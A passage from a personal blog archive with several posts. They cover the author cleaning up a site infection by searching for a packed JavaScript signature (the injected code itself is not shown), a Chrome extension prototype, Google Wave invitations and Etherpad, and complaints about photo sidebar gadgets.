Yes. It finally happened. After... 6 years? on the web I finally got hacked.
Two domains affected:
(this also of course affected all sub-domains of cmcculloh.com, such as blog.cmcculloh.com).
This morning I went to my site and was told by Chrome that I wasn't allowed to go in because my site was going to infect my machine with H.I.V. (well, not really, but that's how it felt).
Here's the screen I saw:
THE VERY FIRST THING I DID WAS WENT AND CHANGED ALL OF MY PASSWORDS. I even finally got around to creating multiple users and separating all domains/sub-domains into their own user accounts. This way if cmcculloh.com gets cracked again, blog.cmcculloh.com will have less chance of also being compromised.
It took me quite a while to figure out what the culprit was (and I'm still not 100% sure) but then I realized that hallelujahbutton.com is exactly 1 page long it was really easy to find a very likely suspect. This line of code:
(I added a line break for legibility)
EEEEEWWWW!!!!!! I got pwned!!!
Not 100% sure if it is the iframe *and* the script, or just the iframe.
How did I fix it?
ssh'ed into the site and ran this command "grep -ir function\(p,a,c,k,e,d\) *". Found that it was in 46 files. Downloaded the entire site and then did a global find/replace in Sublime Text (Ctrl + Shift + h) on the entire script (that I pasted above) and replaced it with nothing. Then I did a follow up search on "function(p,a,c,k,e,d)" again to confirm it was cleaned. Then I deleted the contents of my site on the server and re-uploaded everything I wanted up there.
So, how did this happen? Who knows. I definitely wasn't the only one. I had, within the last week, used a Chrome App called ShiftEdit and given it my ftp credentials, so I initially thought it might have been them somehow. But then I realized that I share my server with at least 100 other sites. Chances are 99% of those people don't know anything about security, and a good 20 of them probably use "password1" as their password. If any of those people got hacked, it's just a small step once you're on the box to wrangle root access and run a shell script that eats HTML documents and poops them out with your script inside of them (no, I don't know how to do this, but I could most likely be doing it by the end of the week were I so nefariously inclined. It's not hard. USE A GOOD PASSWORD and DON'T REUSE IT ACROSS SITES).
So, anywho, I have cleaned my site and submitted my site to Google for verification so that we can get this error page back down. DON'T click the "proceed anyway" link. Because I'm just a guy and I could still be infected and not know it. Always just click the "go back" button. Once Google has OK'd it, the site will become available (as hallelujahbutton.com now has).
THANK YOU GOOGLE!!! YOU'RE AWESOME!!! Except that I *really* wish your error pages were more specific on EXACTLY what the problem was instead of making me hunt and hunt for it.
Also, I've deleted hallelujahbutton.com and set the domain name to expire. I completely forgot it existed and am too busy to want to deal with it anymore so, pruned!
So I just made this little extension for Chrome.
There were some pretty convoluted to gymnastics I had to go through to get the console on the page and get it to execute the JS I wanted it to execute. Pretty much the only hook you have it an onClick (from what I can tell). They've got it locked down TIGHT.
This needs a LOT of experimentation done, but it looks like you can use it to define functions on the page through the console and call those functions. However, the functions do NOT persist. So, you can do:
and "execute js" and an alert will come up and say "test".
But you can't do:
and "execute js" and then:
and "execute js" and expect an alert to pop up.
I'm sure there are many sound reasons for this from a security standpoint, but it's annoying as hell to try and program for. It would be great if I could fix this and I have a few ideas as to how I can do that...
The main reason I'm making this is basically as a prototype/POC for the Status-bar Calculator port from FF since I'm going to have to do some very similar things to get the Calculator to show up in the bottom right hand corner (like this does).
So after my previous post with the rousing endorsement for wave (haha) it turns out I actually have 16 wave invitations I can send out.
If anyone wants one, leave a comment with the e-mail you want me to send it to (if you don't want your e-mail sent to the world, just leave a blank comment or something and I'll look at the e-mail you used to make the comment)
Google has purchased Etherpad to kill it so they won't have competition for Wave.
I'm a user of both Etherpad and Wave, and I can say without a doubt that Etherpad (right now) is better. This is crap. Doesn't really look "not evil" to me. Oh well.
Guess this means I'll have to take it out of my TOTW rotation (it was scheduled for the last monday of Dec)...
If you are creating a sidebar gadget that displays photos, you need to accommodate for both landscape and portrait and not force your user to choose one or the other. Google shockingly has done a horrible job of this.
I took some pictures of my beautiful wife over the weekend, and threw them onto my computer. I use Google desktop, so I thought I'd try out their photos gadget to see rotating pictures of her while I work. I ended up very frustrated.
Google's sidebar gadget allows you to choose between portrait,landscape or re-sizeable. If you choose portrait or landscape, it automatically formats it perfectly for one or the other. If you choose re-sizable it allows you to expand or contract it to fit either. But there is no setting to make the picture automatically fit the current size (by throwing black bars around the picture or something). This is absurd. It means that all of the landscape pictures I took get clipped off at the edges if I am on portrait mode, or all the portrait pictures get clipped off if I am on landscape mode.
Windows Vista's sidebar did add in the black bars, but unbelievably gave you no option to resize! This meant that if you were viewing a portrait picture you could pretty much forget actually getting to see anything in the picture beyond just a vague idea of what it is. Even the landscape pictures were poorly scaled down causing people to look rather funny/goblin-esque/gimpy-eyed at times.
Google's gadget allows you to add as many local folders, and even websites, to harvest pictures from as you want, Windows' only allowed you to choose one folder, but did at least allow you to specify that you would like to include all sub-folders as well.
All in all I was very disappointed about my options for a miniature photo slide-show on my desktop. If anyone knows of any better options, please let me know.